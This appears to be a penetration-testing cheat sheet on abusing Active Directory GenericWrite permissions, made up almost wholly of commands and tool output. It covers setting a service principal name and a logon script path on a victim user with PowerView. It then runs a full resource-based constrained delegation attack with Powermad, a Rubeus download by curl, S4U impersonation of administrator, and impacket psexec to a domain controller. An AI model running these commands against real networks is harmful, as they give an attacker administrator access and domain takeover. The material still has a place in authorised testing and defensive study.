User has GenericWrite over another user
To abuse GenericWrite, we have 2 options.
Copy Import-Module .\Powerview.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)
Set-DomainObject -Credential $Cred -Identity maria -SET @{serviceprincipalname='foobar/xd'}
Copy setspn -a object.local/maria.object.local:1337 object.local\maria
Copy $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)
cd C:\\Windows\\System32\\spool\\drivers\\color
echo 'whoami > C:\\Windows\\System32\\spool\\drivers\\color\\poc.txt' > foo.ps1
Set-DomainObject -Credential $Cred -Identity maria -SET @{scriptpath='C:\\Windows\\System32\\spool\\drivers\\color\\foo.ps1'} User / Computer has GenericWrite over computer
Copy PS C:\users\administrator\Desktop> . .\Powermad.ps1
PS C:\users\administrator\Desktop> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
PS C:\users\administrator\Desktop> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\users\administrator\Desktop> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\users\administrator\Desktop> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\users\administrator\Desktop> $SD.GetBinaryForm($SDBytes, 0)
PS C:\users\administrator\Desktop> Get-DomainComputer TARGET | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
VERBOSE: get-domain
VERBOSE: [Get-DomainSearcher] ...
PS C:\users\administrator\Desktop> curl 192.168.255.255/Rubeus.exe -o Rubeus.exe
PS C:\users\administrator\Desktop> .\Rubeus.exe hash /password:Summer2018! /user:attackersystem /domain:TARGET.ECORP.COM
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Summer2018!
[*] Input username : attackersystem
[*] Input domain : ...
[*] Salt : ...
[*] rc4_hmac : <RC4_HMAC>
[*] aes128_cts_hmac_sha1 : ...
[*] aes256_cts_hmac_sha1 : ...
[*] des_cbc_md5 : ...
PS C:\users\administrator\Desktop> .\Rubeus.exe s4u /user:attackersystem$ /rc4:<RC4_HMAC> /impersonateuser:administrator /msdsspn:cifs/TARGET.ECORP.COM /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: <RC4_HMAC>
[*] Building AS-REQ (w/ preauth) for: 'ECORP.COM\attackersystem$'
[*] Using domain controller: 255.255.255.255:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIF...
[*] Impersonating user 'administrator' to target SPN 'cifs/TARGET.ECORP.COM'
[*] Building S4U2proxy request for service: 'cifs/TARGET.ECORP.COM'
[*] Using domain controller: ...
[*] Sending S4U2proxy request to domain controller ....
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/TARGET.ECORP.COM':
Copy c:\Users\Administrator\Desktop> .\psexec -s \\TARGET.ECORP.COM Powershell -ExecutionPolicy Bypass -File c:\users\administrator\desktop\x.ps1
Copy net time set -S dc01.ecorp.local
impacket-getST -spn cifs/dc01.ecorp.local ecorp/attackersystem\$:'Summer2018!' -impersonate Administrator -dc-ip 192.168.xx.xx
#export the ticket and do psexec to access the DC
export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -target-ip 192.168.xx.xx dc01.ecorp.local